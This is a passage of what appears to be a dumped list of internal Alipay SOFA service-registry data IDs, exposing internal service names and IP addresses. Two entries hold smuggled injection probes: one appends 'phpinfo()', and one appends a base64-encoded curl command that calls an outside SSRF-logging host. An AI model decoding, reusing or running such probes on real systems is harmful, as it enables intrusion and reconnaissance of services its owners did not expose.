ergency.biz.drm.SystemConfigDrmResource.bizCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.delivery.AssetDeliveryLogisticsRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:phpinfo()@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.145.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservindustryprod.common.service.facade.recruit.ApplyRecordsManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antlink.facade.RelationServiceFacade:1.0:antlinkmsdefault@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.developerops.facade.api.CatalogManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdswp.common.service.facade.adm.AdmCtuService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","assetfluxdcsmirror@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.testmeshend.facade.ServiceOfObserveMode3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antpim.common.service.facade.prod.api.StdProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.api.IterationConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.transfer.AssignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.MicroAppDeployUnitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:Y3VybCBodHRwOi8vTXpNd01qUTROamt0TFRFd05EQXdNekF5TWcuc3NyZi5ub2JsZS5sb2cubHlubnNoYXJlLmNj@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imif.opcenter.common.service.facade.crm.api.ContractCrmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.outsideSettleNoRelyOnBizInfoProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.biz.service.gw.community.api.workpoint.WorkPointGWManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.BusiRecordMngQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zbdm.common.service.facade.search.TableSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mitemcenter.common.service.facade.api.query.PropertyValueQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.base.service.ExplorerTableQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.TxpSwitchResource.disableRefundPids,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbatch.comm.service.facade.accept.FinBatchSchedulerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.ipp.service.facade.template.IppTemplateProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antdsr.common.service.facade.ProxyClient:1.0:antbuserviceProxyClient_antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.integration.mobilerelation.AlipayRelationQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.loadTestZdatabusTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.184.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promomng.core.service.process.ServiceTask:1.0:lbsFenseDataStatusServiceTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.contract.facade.Contract4MngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.chargeTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.243.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ismonitor.common.service.facade.censor.CensorBDtaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.dcommservice.facade.backoffice.api.OrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthactequitytwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofazdaldemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.identity.IdpConfigServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gotone.common.service.api.SendSmsService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fidoserver.common.service.facade.IFAAServerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.FundAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ACCTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintranscore.common.service.facade.trans.FinTransOrderQueryFacade:1.0:bkftranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.airbops.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.identity.MasterServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.partner.repository.BizMonConfRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_UTP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.agdsccalipayCreditSwitchStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.prodcenter.common.service.facade.contract.custom.api.AccountContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.OstsIndustryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.232.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.${fluxconf_app_name}:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.mergeSyncTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-kbinventorycenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:PromoPlatform_malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.paramcore.common.service.manage.facade.api.template.ParmJsonSchemaTemplateProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.cashing.service.CashingOrderCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileorderprod.service.rpc.ItemQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accha.core.drm.ElasticDBSourceCheckParamsDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.184.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.cryptprod.common.service.facade.CipherKeyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:compassprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpdcore:name=com.alipay.fc.prodquery.core.service.drm.PdCoreCacheRefreshDRM.refreshStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zfcertifycenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.flowctrl6016#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insapportion.common.service.facade.loadtest.ThreeLayersExecuterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payacceptance.common.service.senior.api.ReceiptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.open.facade.PlmAppOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFrameManager.environment,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.SDKTest:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsDwVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_F_ZDOMAIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rinsight.common.base.spi.RinsightListDataRpcSpi:1.0:accountQualityService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanRestructureConfigDrm.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iconnect.common.facade.api.DeliveryToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.cif.common.service.facade.api.UserQueryServiceFacade:1.0:fscCifService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:inclusionconfdeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zhub.zolozdevice.DeviceInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.McardInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsapiDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.normalapp:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointprod.common.service.dispatch.api.PointDispatchQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BEYONDTRUSTDBMESH#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.salesmng.common.service.facade.merchant.api.BizManagerIndustryPoolService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.CollageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.putContextsRetryTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:alideviceinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.client.serivce.ExterfaceInvokeService:1.0:inshealthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:sffcontainer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchpromoprod.facade.access.AccessCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:pledgecoreAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bcvoucher.facade.api.TemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aclinkelib.common.service.facade.ComponentResultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:fascore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_close_biz_order_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservemng.service.facade.query.InstAccBalanceQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendMsgboxService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.232.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.ProductLimitedDRM.isF2FLimited,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcommerceprod.common.service.facade.wireless.ExhibitManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:wealthapptwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.FundContractFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.176.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acauthcore.common.service.facade.manager.AuthRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.config-security-false:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.137.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchservbase.member.facade.KaBaoTemplateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.230.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fpdecision.fake.facade.ifacade.DecisionExecutorFacade:1.0:fakeDecisionExecutorFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.PromotionBaseInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmcore.common.service.facade.api.MerchantReportInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditsentry.facade.JbTestAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.77.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.30.196.217#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.progov.service.api.ProductExcFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paylink.service.facade.PrizeLinkFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.common.service.integration.drm.IntegrationMigrateDrm.instassetMigrateSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finopencore.common.service.fop.facade.TaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_LINKW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.girisk.common.service.facade.api.risk.RiskIdentifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.underwrite.UnderwriteTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.cert.DigitalCertQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_ZC_TR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobilegeocoding@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransSettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.tradeapcore.tradeapcore_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.amlmatrix.biz.shared.common.interfaces.PbcReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:sdaxconnectplatform@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.change.ChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.SetLogLevelDRM.newlogLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:pointExpireMsgNotifyExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_mmFixedTransferIntoProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.mybank.service.MybkOpenAndBindService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.FilePolicyService:1.0:filePolicyService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbconfigcenter.common.service.facade.api.BizRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.baas.facade.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:jianjia_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoPolicyTraceFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","caprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.null:name=com.antcloud.ifcidentitycloudus.biz.nac.drm.NacConfigDrmServiceImpl.tntInstAlias,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.link.facade.RelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.common.service.facade.api.promo.BudgetSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.MerchantCardTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-anteduprod-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yebplus.common.facade.service.api.yebscene.YebcCampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.pipeline.common.facade.core.logictable.PipelineLogicTableOpenService:1.0:dppipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.OpenServerCheckFacade:1.0:openServerCheckFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.InvoiceLotteryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.sci.SciCompareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbprocess.common.service.facade.callback.ProcessCallback:1.0:paveTemplateAuditPostHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanprod.common.service.facade.service.lend.PledgeLendAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_DEFAULT_UNIFORM_EVENT2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.unibase.common.service.facade.api.venue.VenueQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.common.service.FeatureMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemsgprod.common.service.facade.admin.template.PublicMsgTemplateAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.citygroup.CityGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.CategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linkw.common.service.facade.OneKeyDeployFacade:1.0:finatpOneKeyDeployFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.client.facade.SocialContactViewClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.QueryBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.mif.common.service.facade.MerchantOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acpartner.common.service.facade.ServiceMarketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.MarketRecordServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.process.ProcessMngEventQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.notLoginStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.common.manage.facade.CardBaseInfoManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.cashback.service.facade.SnailGuideService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_USERPRIVILEGE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcsmartdecision.service.PcreditOrgBalanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.test2.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.custdecision.service.permlimit.facade.ConsistencyTendencyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.bullstock.BullStockAnswerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.EmotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccr.facade.RepayBillQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepprod.common.service.facade.api.WhiteUserOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.agentfund.api.AftransTransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.topology.common.service.facade.api.topologyversion.TopologyVersionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.FixedInvestmentPrecheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yunfengdieweb:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeOldPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dpcscgateway.common.service.facade.NtmProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.pullThresholdForQueue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.voucherfront.common.service.facade.api.template.TemplateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.247.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.instasset:name=com.alipay.instasset.client.DrmResource.command,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.idatacontext.common.service.facade.DataContextConsumeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.tairHitRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.baas.ProductConfigMngFacade:1.0@XFIRE#@#DEFAUL